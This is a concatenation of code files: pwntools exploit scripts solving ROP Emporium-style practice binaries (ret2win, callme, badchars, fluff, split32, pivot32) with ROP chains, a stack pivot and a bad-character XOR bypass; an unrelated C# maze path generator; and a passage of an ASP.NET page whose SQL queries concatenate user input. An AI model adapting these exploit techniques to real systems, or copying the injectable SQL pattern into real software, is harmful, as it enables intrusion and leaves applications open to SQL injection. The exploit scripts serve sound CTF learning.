r.call(elf.plt['callme_one'],[dead, cafe, dood])
r.call(elf.plt['callme_two'],[dead, cafe, dood])
r.call(elf.plt['callme_three'],[dead, cafe, dood])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('two() called correctly\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './badchars'
elf = ELF(filename)
io = process(filename)
# variables
flag_string = b'flce,tzt'
# gadgets
r = ROP(elf)
mov = p64(0x400634) # mov qword [r13], r12; retn;
xor = p64(0x400628) # xor byte [r15], r14b; retn;
pop_r12 = p64(r.r12.address) # 0x40069c: pop r12, pop r13, pop r14, pop r15, retn;
pop_r14 = p64(r.r14.address) # 0x4006a0: pop r14, pop r15, retn;
bss = elf.bss()
# bad chars 'x' 'g' 'a' '.'
# xor'd string 'flce,tzt'
# 0x02 key at indexes [2,3,4,6]
r.raw(cyclic(40))
# write & xor index 2
r.raw(pop_r12) # pop r12, r13, r14, r15
r.raw(flag_string) # load string
r.raw(p64(bss)) # string location
r.raw(0x2) # xor key
r.raw(p64(bss+2)) # xor index 2 location (1 byte)
r.raw(mov) # write string
r.raw(xor) # xor index 2
# xor index 3
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+3)) # xor index 3
r.raw(xor)
# xor index 4
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+4)) # xor index 4
r.raw(xor)
# xor index 6
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+6)) # xor index 6
r.raw(xor)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './fluff'
elf = ELF(filename)
io = process(filename)
# variables
input_string = b'flag.txt'
char_addresses = []
# gadgets
r = ROP(elf)
xlat = p64(0x400628) # xlatb; ret;
bextr = p64(0x40062a) # pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
stosb = p64(0x400639) # stosb byte ptr [rdi], al; ret;
pop_rdi = p64(r.rdi.address) # pop rdi; ret;
bss = elf.bss()
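# Illustrative walkthrough (added): bextr with rdx = 0x4000 copies 0x40 bits
# starting at bit 0, so after the fixed add rbx = char_address - al
# (al is 0xb on entry, per curr_rax below, or the last byte written).
# xlatb then loads al = [rbx + al] = the target character, and stosb
# stores al at rdi = bss + index.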
# helper functions
def find_string(string):
f = elf.file.read()
for i in string:
offset = f.find(i)
address = 0x400000 + offset
char_addresses.append(address)
def write_string(string, index):
rop = ROP(elf)
curr_rax = 0xb
if(index != 0):
curr_rax = string[index-1]
rop.raw(bextr)
rop.raw(0x4000)
p = char_addresses[index] - curr_rax - 0x3ef2
rop.raw(p64(p))
rop.raw(xlat)
rop.raw(pop_rdi)
rop.raw(p64(bss+index))
rop.raw(stosb)
return rop.chain()
# main
find_string(input_string)
payload = b''
payload += cyclic(40)
for i in range(0,8):
payload += write_string(input_string, i)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>val = 'flag.txt'
res = '\n'.join(format(ord(i), 'b') for i in val)
print("{}".format(res))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './split32'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(44))
r.call(elf.plt['system'], [0x0804a030])
r.call('main')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './pivot32'
libname = './libpivot32.so'
elf = ELF(filename)
lib = ELF(libname)
io = process(filename)
# gadgets
r = ROP(elf)
call_eax = p32(0x80485f0) # call eax;
xchg = p32(0x804882e) # xchg eax, esp; ret;
mov_eax_eax = p32(0x8048830) # mov eax, dword ptr [eax]; ret;
add_eax_ebx = p32(0x8048833) # add eax, ebx; ret;
pop_eax = p32(0x804882c) # pop eax; ret;
pop_ebx = p32(0x80484a9) # pop ebx; ret;
fthold_plt = p32(elf.plt.foothold_function)
fthold_got = p32(elf.got.foothold_function)
ret2win_off = p32(lib.sym.ret2win - lib.sym.foothold_function)
# get leaked address
io.recvuntil("pivot: ")
leak = int(io.recvline().strip()[0:10], 16)
log.info('Leaked: ' + hex(leak))
leak = p32(leak)
# stack smash
# putting leaked address into esp
smash = ROP(elf)
smash.raw(cyclic(44))
smash.raw(pop_eax)
smash.raw(leak)
smash.raw(xchg) # put leaked address into esp
# set up <EMAIL>
rop = ROP(elf)
rop.raw(fthold_plt) # gen .got.plt
rop.raw(pop_eax)
rop.raw(fthold_got) # gen .got.plt
# call ret2win using fthold address + offset
rop.raw(mov_eax_eax) # mov <EMAIL> address into eax
rop.raw(pop_ebx)
rop.raw(ret2win_off) # ret2win - fthold
rop.raw(add_eax_ebx) # add offset to eax(<EMAIL>)
rop.raw(call_eax) # call eax(now pointing to <EMAIL>)
io.recvuntil('> ')
io.sendline(rop.chain())
io.recvuntil('> ')
io.sendline(smash.chain())
io.recvuntil('vot\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './ret2win'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(40))
r.call('ret2win')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil(':\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './callme32'
elf = ELF(filename)
io = process(filename)
# variables
dead = 0xdeadbeef
cafe = 0xcafebabe
dood = 0xd00df00d
r = ROP(elf)
r.raw(cyclic(44))
r.call(elf.plt['callme_one'], [dead, cafe, dood])
r.call(elf.plt['callme_two'], [dead, cafe, dood])
r.call(elf.plt['callme_three'], [dead, cafe, dood])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('two() called correctly\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<repo_name>Morigun/PathCreator<file_sep>/PathCreator/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Program
{
static ElementPath[,] ep;
        /*Current path*/
        static int iTecPath = 0;
        static int iX = 50, iY = 50;
        /*The field*/
        static int[,] iPole = new int[iX, iY];
        /*The field as class objects*/
        static Field[,] fPole = new Field[iX, iY];
        /*Number of dead ends*/
        static int iCountEndPath;
        /*Number of turns*/
        static int iCountPov;
        /*Length of the main path*/
        static int iLengthPath;
        /*Current direction*/
        static int iTecDir;
        /*Number of used paths*/
        static int iCountEPEnded = 1;
        /*Length of the extra path*/
        static int iLengthDopPath;
        /*Current turn*/
        static int iTecPov;
static bool bLuck;
static Random rndCEP = new Random();
static Random rndCP = new Random();
static Random rndLP = new Random();
static Random rndDir = new Random();
static Random rndPov = new Random();
public static Field.Symb[] sTab = new Field.Symb[17];
static void Main(string[] args)
{
            /*Initialize the field*/
            //InicPole();
            InicFPole();
            VivodfPole();
            InicSTab();
            /*Print the field*/
            //VivodPole();
            Console.WriteLine("GENERATE");
            /*Generate the number of dead ends*/
            iCountEndPath = rndCEP.Next(20, 30);
            /*Generate the path length*/
            iLengthPath = GenSymplePath(0, 25, 25);
            /*Initialize the dead ends plus the main path*/
            ep = new ElementPath[iLengthPath, iCountEndPath + 1];
            /*Generate the number of turns*/
            iCountPov = rndCP.Next(5, 11);
            /*Field-filling loop*/
//GenForPath(iLengthPath, 0);
GenForFPath(iLengthPath, 0);
//VivodPole();
VivodfPole();
Console.ReadLine();
}
static void InicPole()
{
for (int x = 0; x < iX; x++)
for (int y = 0; y < iY; y++)
iPole[x, y] = 0;
iPole[25, 25] = 9;
}
static void InicFPole()
{
for (int x = 0; x < iX; x++)
for (int y = 0; y < iY; y++)
fPole[x, y] = new Field();
fPole[0, 0] = new Field((char)'╔');
}
static void VivodPole()
{
for (int x = 0; x < iX; x++)
{
for (int y = 0; y < iY; y++)
{
Console.Write("{0}",iPole[x, y],x,y);
}
Console.WriteLine();
}
}
static void VivodfPole()
{
for (int x = 0; x < iX; x++)
{
for (int y = 0; y < iY; y++)
{
Console.Write("{0}", fPole[x, y].ToString(), x, y);
}
Console.WriteLine();
}
}
static Coordinats.Coord SetPosPath(Coordinats.Coord c, int iPath, int d)
{
int x, y;
x = c.GetX();
y = c.GetY();
switch (d)
{
case 0:
//iPole[x - 1, y] = 1;
iPole[x, y] = 1;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 0 NEW X{1} NEW Y{2} X{3} Y{4}", 1, x - 1, y, x, y);
return new Coordinats.Coord(x - 1, y);
case 1:
//iPole[x, y + 1] = 2;
iPole[x, y] = 2;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 1 NEW X{1} NEW Y{2} X{3} Y{4}", 2, x, y + 1, x, y);
return new Coordinats.Coord(x, y + 1);
case 2:
//iPole[x + 1, y] = 3;
iPole[x, y] = 3;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 2 NEW X{1} NEW Y{2} X{3} Y{4}", 3, x + 1, y, x, y);
return new Coordinats.Coord(x + 1, y);
case 3:
//iPole[x, y - 1] = 4;
iPole[x, y] = 4;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 3 NEW X{1} NEW Y{2} X{3} Y{4}", 4, x, y - 1, x, y);
return new Coordinats.Coord(x, y - 1);
}
return new Coordinats.Coord(c);
}
//static bool CheckCoord(Coordinats.Coord c, int d)
//{
// int x, y;
// x = c.GetX();
// y = c.GetY();
// try
// {
// switch (d)
// {
// case 0: //Nort
// if (iPole[x - 1, y] != 1 && iPole[x - 1, y] != 2 && iPole[x - 1, y] != 3 && iPole[x - 1, y] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 1: //East
// if (iPole[x, y + 1] != 1 && iPole[x, y + 1] != 2 && iPole[x, y + 1] != 3 && iPole[x, y + 1] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 2: //South
// if (iPole[x + 1, y] != 1 && iPole[x + 1, y] != 2 && iPole[x + 1, y] != 3 && iPole[x + 1, y] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 3: //West
// if (iPole[x, y - 1] != 1 && iPole[x, y - 1] != 2 && iPole[x, y - 1] != 3 && iPole[x, y - 1] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// }
// return false;
// }
// catch(System.IndexOutOfRangeException ex)
// {
// return false;
// }
//}
static bool CheckFCoord(Coordinats.Coord c, int d)
{
int x, y;
x = c.GetX();
y = c.GetY();
try
{
switch (d)
{
case 0: //Nort
if (fPole[x - 1, y].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 1: //East
if (fPole[x, y + 1].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 2: //South
if (fPole[x + 1, y].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 3: //West
if (fPole[x, y - 1].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
}
}
catch (System.Exception ex)
{
return false;
}
return false;
}
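        /* Illustrative note (added): per the switch comments above, directions
           are encoded as 0 = north, 1 = east, 2 = south, 3 = west throughout
           the generator. */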
public static void InicSTab()
{
sTab[0] = new Field.Symb("01300", '╔');
sTab[1] = new Field.Symb("02230", '╦');
sTab[2] = new Field.Symb("01200", '╗');
sTab[3] = new Field.Symb("02120", '╠');
sTab[4] = new Field.Symb("03123", '╬');
sTab[5] = new Field.Symb("02130", '╣');
sTab[6] = new Field.Symb("01100", '╚');
sTab[7] = new Field.Symb("42120", '╩');
sTab[8] = new Field.Symb("41100", '╝');
sTab[9] = new Field.Symb("41200", '═');
sTab[10] = new Field.Symb("11300", '║');
sTab[11] = new Field.Symb("31000", '╔');
sTab[12] = new Field.Symb("12000", '╠');
sTab[13] = new Field.Symb("11000", '╚');
sTab[14] = new Field.Symb("11400", '╝');
sTab[15] = new Field.Symb("21400", '═');
sTab[16] = new Field.Symb("11300", '║');
/*sTab[17] = new Field.Symb("00000", '█');
sTab[18] = new Field.Symb("00000", '█');
sTab[19] = new Field.Symb("00000", '█');
sTab[20] = new Field.Symb("00000", '█');
sTab[21] = new Field.Symb("00000", '█');
sTab[22] = new Field.Symb("00000", '█');*/
}
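        /* Illustrative note (added, interpretation): each Symb code appears to
           be the five-digit string "{previousDirection}{count}{newDirection}00"
           that GetNextEl formats below, so the table selects the box-drawing
           glyph joining the previous path segment to the next one. */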
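        /*Writes the glyph for the current cell via GetNextEl, appends the coordinate
          to path iPath, and returns the coordinate of the next cell in direction d
          (0=N, 1=E, 2=S, 3=W).*/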
static Coordinats.Coord SetPosFPath(Coordinats.Coord c, int iPath, int d, int p)
{
int x, y;
x = c.GetX();
y = c.GetY();
switch (d)
{
case 0:
//iPole[x - 1, y] = 1;
fPole[x, y].SetValue(/*Field.cCUPer*/GetNextEl(ep[iPath].GetPrevDirInt(),p,d), ep[iPath]); //= 1;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 0 NEW X{1} NEW Y{2} X{3} Y{4}", 1, x - 1, y, x, y);
return new Coordinats.Coord(x - 1, y);
case 1:
//iPole[x, y + 1] = 2;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 1 NEW X{1} NEW Y{2} X{3} Y{4}", 2, x, y + 1, x, y);
return new Coordinats.Coord(x, y + 1);
case 2:
//iPole[x + 1, y] = 3;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 2 NEW X{1} NEW Y{2} X{3} Y{4}", 3, x + 1, y, x, y);
return new Coordinats.Coord(x + 1, y);
case 3:
//iPole[x, y - 1] = 4;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 3 NEW X{1} NEW Y{2} X{3} Y{4}", 4, x, y - 1, x, y);
return new Coordinats.Coord(x, y - 1);
}
return new Coordinats.Coord(c);
}
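        /*Main generation loop: picks a random direction and turn type each step,
          extends the path when the target cell is free, and recursively spawns
          branch paths while the turn (iCountPov) and endpoint (iCountEndPath)
          budgets allow.*/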
static void GenForFPath(int iPathLen, int iCoun, int iFTP = 0)
{
int iFTecDir, iFTecPov, iFTecPath = 0;
iFTecPath = iFTecPath + iCoun;
for (int p = 0; p < iPathLen; p++)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(Environment.CurrentDirectory + @"\log.txt", true))
{
file.WriteLine("TEST {0} {1} {2}", p, iCountPov, iCountEndPath);
}
iFTecDir = ElementPath.CheckDir(rndDir.Next(0, 101));
iFTecPov = ElementPath.CheckPov(rndPov.Next(0, 101));
            /*Set the direction*/
            ep[iFTecPath].SetDirection(iFTecDir);
            /*Set the turn type*/
            ep[iFTecPath].SetPovorot(iFTecPov);
if (iFTecPov == 0)
{
if (CheckFCoord(ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count-1], iFTecDir) == true)
{
                    /*Place the path element*/
ep[iFTecPath].SetCoord(SetPosFPath(ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1], iFTecPath, iFTecDir, iFTP));
iPathLen--;
bLuck = true;
}
else
{
p--;
bLuck = false;
}
}
            /*Branch path*/
else
{
if (iCountPov != 0)
{
if (iCountEndPath > iFTecPath)
{
for (int p2 = 0; p2 < iFTecPov; p2++)
{
GenForFPath(GenSymplePath(iFTecPath + 1, ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1].GetX(), ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1].GetY()), iFTecPath + 1, iFTecPov);
}
iCountEndPath--;
}
iCountPov--;
}
}
}
}
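        /*Looks up the glyph whose sTab code matches the (previous direction, turn
          count, new direction) triple; returns cVoid when nothing matches.*/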
static char GetNextEl(int iIn, int iCountIn, int iDir)
{
string sCode = String.Format("{0}{1}{2}{3}{4}",iIn,iCountIn,iDir,0,0);
foreach (Field.Symb c in sTab)
{
Console.WriteLine("{0}{1}{2}{3}{4} {5} {6}", iIn, iCountIn, iDir, 0, 0, sCode, c.sCode);
if (c.sCode == sCode)
return c.cSym;
}
return Field.cVoid;
}
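        /*Creates path element iPathNum at (iX, iY) with a random length in [500,1000)
          and a random initial direction, returning the generated length.*/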
static int GenSymplePath(int iPathNum, int iX, int iY)
{
            int iTempPath;
            /*Generate the path length*/
            iTempPath = rndLP.Next(500, 1000);
            /*Pick a random initial direction (0-3)*/
            iTecDir = rndDir.Next(0, 4);
            /*Initialize this path element*/
            ep[iPathNum] = new ElementPath(iTempPath, 0, 0, iTecDir, iX, iY);
return iTempPath;
}
/*static int GetStartPath(int i)
{
if (ep[i].Cord[ep[i].Cord.Count-1] == ep[i].Cord[ep[i].Cord.Count-2])
}*/
}
}
<file_sep>/PathCreator/Field.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Field
{
public const char cLUUg = '╔', cCUPer = '╦', cURUg = '╗';
public const char cLCUg = '╠', cCCPer = '╬', cCRUg = '╣';
public const char cLDUg = '╚', cCDPer = '╩', cDRUg = '╝';
public const char cInOutG = '═';
public const char cInOutV = '║';
public const char cVoid = '█';
public struct Symb
{
public string sCode;
public char cSym;
public Symb(string sC, char cS)
{
this.sCode = sC;
this.cSym = cS;
}
}
char cValue;
bool bUsed
{
get;
set;
}
ElementPath ep;
public Field()
{
SetDef();
}
public Field(char cv)
{
this.cValue = cv;
}
public void SetValue(char cV, ElementPath e)
{
this.cValue = cV;
this.ep = e;
this.bUsed = true;
}
public void SetDef()
{
this.cValue = cVoid;
this.bUsed = false;
}
public override string ToString()
{
return this.cValue.ToString();
}
public char GetVal()
{
return this.cValue;
}
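        /*Given the previous cell's glyph and the current direction/turn, returns the
          glyph that continues the path. Only the straight case (iTecPov == 0) is
          fully implemented; the branching cases currently fall back to cVoid.*/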
public char GetEl(char cPr, int iTecDir, int iTecPov, int iNewDir)
{
if (iTecPov == 0)
{
switch (cPr)
{
                    /*Top row*/
case cLUUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
case cCUPer:
if (iTecDir == 1 || iTecDir == 3)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
case cURUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
                    /*Middle row*/
case cLCUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
case cCCPer:
if (iTecDir == 1 || iTecDir == 3)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
case cCRUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
                    /*Bottom row*/
case cLDUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
case cCDPer:
if (iTecDir == 3 || iTecDir == 1)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
case cDRUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
                    /*Horizontal*/
case cInOutG:
return cInOutG;
                    /*Vertical*/
case cInOutV:
return cInOutV;
}
}
else if (iTecPov == 1)
{
switch (cPr)
{
case cLUUg:
break;
}
return cVoid;
}
else if (iTecPov == 2)
{
return cVoid;
}
return cVoid;
}
}
}
<file_sep>/PathCreator/Coordinats.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Coordinats
{
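        /*Lightweight 2D grid coordinate used throughout the path generator.*/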
public struct Coord
{
public int x
{
get;
set;
}
public int y
{
get;
set;
}
public Coord (int iX, int iY) : this()
{
x = iX;
y = iY;
}
public Coord (Coord c) : this()
{
x = c.x;
y = c.y;
}
public int GetX()
{
return this.x;
}
public int GetY()
{
return this.y;
}
}
}
}
<file_sep>/PathCreator/ElementPath.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class ElementPath
{
public enum ePovorot { Simple = 0, Two = 1, Triple = 2 };
        public enum eDirection { north = 0, east = 1, south = 2, west = 3 }; // 0=N, 1=E, 2=S, 3=W, matching SetDirection/GetTecDirInt
public int iLength
{
get;
set;
}
public List<eDirection> eDirArr
{
get;
set;
}
public List<ePovorot> ePovArr
{
get;
set;
}
public ePovorot pov
{
get;
set;
}
public eDirection dir
{
get;
set;
}
bool bGlav
{
get;
set;
}
bool bEnd
{
get;
set;
}
public List<Coordinats.Coord> Cord;
int ID
{
get;
set;
}
public ElementPath()
{
this.ID = 0;
this.iLength = 0;
this.bGlav = true;
this.bEnd = false;
this.ePovArr = new List<ePovorot>();
SetPovorot(1);
this.eDirArr = new List<eDirection>();
SetDirection(1);
this.Cord = new List<Coordinats.Coord>();
SetCoord(0, 0);
}
public ElementPath(int iLen, int i, int p, int d, int x, int y)
{
this.ID = i;
this.iLength = iLen;
if (i == 0)
this.bGlav = true;
else
this.bGlav = false;
this.bEnd = false;
this.ePovArr = new List<ePovorot>();
SetPovorot(p);
this.eDirArr = new List<eDirection>();
SetDirection(d);
this.Cord = new List<Coordinats.Coord>();
SetCoord(x, y);
}
public void SetEnd()
{
this.bEnd = true;
}
public void SetPovorot(int p)
{
switch(p)
{
case 0:
this.pov = ePovorot.Simple;
this.ePovArr.Add(ePovorot.Simple);
break;
case 1:
this.pov = ePovorot.Two;
this.ePovArr.Add(ePovorot.Two);
break;
case 2:
this.pov = ePovorot.Triple;
this.ePovArr.Add(ePovorot.Triple);
break;
}
}
public void SetDirection(int d)
{
switch (d)
{
case 0:
this.dir = eDirection.north;
this.eDirArr.Add(eDirection.north);
break;
case 1:
this.dir = eDirection.east;
this.eDirArr.Add(eDirection.east);
break;
case 2:
this.dir = eDirection.south;
this.eDirArr.Add(eDirection.south);
break;
case 3:
this.dir = eDirection.west;
this.eDirArr.Add(eDirection.west);
break;
}
}
public eDirection GetPrevDir()
{
if (this.eDirArr.Count > 1)
return this.eDirArr[this.eDirArr.Count - 2];
else
return this.eDirArr[this.eDirArr.Count - 1];
}
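        /*Integer form of GetPrevDir, using the 0=N, 1=E, 2=S, 3=W convention shared
          across the generator.*/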
public int GetPrevDirInt()
{
int iMin;
if (this.eDirArr.Count > 1)
iMin = 2;
else
iMin = 1;
switch (this.eDirArr[this.eDirArr.Count - iMin])
{
case eDirection.east:
return 1;
case eDirection.north:
return 0;
case eDirection.south:
return 2;
case eDirection.west:
return 3;
}
return 0;
}
public int GetTecDirInt()
{
switch (this.eDirArr[this.eDirArr.Count - 1])
{
case eDirection.east:
return 1;
case eDirection.north:
return 0;
case eDirection.south:
return 2;
case eDirection.west:
return 3;
}
return 0;
}
public eDirection GetTecDir()
{
return this.eDirArr[this.eDirArr.Count - 1];
}
public ePovorot GetPrevPov()
{
if (this.ePovArr.Count > 1)
return this.ePovArr[this.ePovArr.Count - 2];
else
return this.ePovArr[this.ePovArr.Count - 1];
}
public int GetPrevPovInt()
{
int iMin;
if (this.ePovArr.Count > 1)
iMin = 2;
else
iMin = 1;
switch (this.ePovArr[this.ePovArr.Count - iMin])
{
case ePovorot.Simple:
return 0;
case ePovorot.Two:
return 1;
case ePovorot.Triple:
return 2;
}
return 0;
}
public int GetTecPovInt()
{
switch (this.ePovArr[this.ePovArr.Count - 1])
{
case ePovorot.Simple:
return 0;
case ePovorot.Two:
return 1;
case ePovorot.Triple:
return 2;
}
return 0;
}
public ePovorot GetTecPov()
{
return this.ePovArr[this.ePovArr.Count - 1];
}
public void SetCoord(int x, int y)
{
this.Cord.Add(new Coordinats.Coord(x, y));
}
public void SetCoord(Coordinats.Coord c)
{
this.Cord.Add(c);
}
public void SetLength()
{
this.iLength--;
}
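        /*Maps a uniform random value in [0,100] to a direction with roughly equal
          probability (0=N, 1=E, 2=S, 3=W); CheckPov below does the same for the
          three turn types.*/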
public static int CheckDir(int i)
{
if (i < 25)
{
return 0;
}
else if (i >= 25 && i < 50)
{
return 1;
}
else if (i >= 50 && i < 75)
{
return 2;
}
else
return 3;
}
public static int CheckPov(int i)
{
if (i < 33)
{
return 0;
}
else if (i >= 33 && i < 66)
{
return 1;
}
else
return 2;
}
}
}
41de11a20b5a6996ef7e450151d1e2a203a6c6b4 | ["C#"] | 4 | C# | Morigun/PathCreator | 3a779aa8bb6d1a97e549ad01a400d96a202fd515 | 8e4ec4b77f7ca58884f5278b82c2e65a40dafec7
refs/heads/master
<repo_name>B15IP/PIPv37<file_sep>/PIP/OrganizatoriEveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
public partial class OrganizatoriEveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool Proprietar = false;
protected void Page_Load(object sender, EventArgs e)
{
VerificareProprietar(sender, e);
if (Proprietar)
{
ButtonInvitaOrganizatori.Visible = true;
OrganizatoriInvitati();
}
}
private void VerificareProprietar(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_prop = 0;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Id_prop = SRD.GetInt32(SRD.GetOrdinal("id_proprietar"));
}
}
sqlConnection1.Close();
if (Id_prop == Id_curent)
Proprietar = true;
}
}
protected void ButtonInvitaOrganizatori_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
int utilizatorExista = 0, idUtilizatorInvitat = -1;
if (UserNameOrganizatorInvitat.Text == "")
{
MesajEroare.Text = "Va rugam sa completati casuta text cu un username";
return;
}
        try // check that this username exists
{
sqlConnection1.Open();
cmd.CommandText = "Select count(id) from utilizator where acont COLLATE SQL_Latin1_General_CP1_CS_AS ='" + UserNameOrganizatorInvitat.Text + "' COLLATE SQL_Latin1_General_CP1_CS_AS ;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
utilizatorExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
if (utilizatorExista == 0)
{
MesajEroare.Text = "Utilizator nu exista";
return;
}
        try // fetch the invited user's id
{
sqlConnection1.Open();
cmd.CommandText = "Select id from utilizator where acont COLLATE SQL_Latin1_General_CP1_CS_AS ='" + UserNameOrganizatorInvitat.Text + "' COLLATE SQL_Latin1_General_CP1_CS_AS;";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
idUtilizatorInvitat = SRD.GetInt32(SRD.GetOrdinal("id"));
}
}
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
utilizatorExista = 0;
        try // check whether this invitation already exists (the primary key enforces this too)
{
sqlConnection1.Open();
cmd.CommandText = "Select count(id_organizator) from organizeaza where id_eveniment =" + Session["IdEvenimentSelectat"] + " and id_organizator = " + idUtilizatorInvitat;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
            // reuse utilizatorExista instead of declaring another variable
utilizatorExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
        // also make sure the owner cannot send an invitation to himself
        if (utilizatorExista != 0 || idUtilizatorInvitat == Convert.ToInt32(Session["Id"]))
{
MesajEroare.Text = "Mai introduceti inca o data username-ul";
return;
}
        try // insert into organizeaza; aprobat defaults to false
{
sqlConnection1.Open();
cmd.CommandText = "Insert into organizeaza(id_eveniment,id_organizator) values( " + Session["IdEvenimentSelectat"] + ", " + idUtilizatorInvitat + ")";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
LabelInvitatieTrimisa.Text = "Invitatie trimisa cu succes ";
Response.Redirect("OrganizatoriEveniment.aspx");
}
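    // The queries above splice user input directly into the SQL text, which is open
    // to SQL injection. A minimal sketch of the same account lookup with a
    // parameterized command (GetUserIdByAccount is a hypothetical helper, not used
    // elsewhere; the original query's case-sensitive COLLATE clause is omitted here):
    private int GetUserIdByAccount(string account)
    {
        using (SqlCommand cmd = new SqlCommand(
            "select id from utilizator where acont = @acont", sqlConnection1))
        {
            cmd.Parameters.AddWithValue("@acont", account); // value is escaped by the driver
            sqlConnection1.Open();
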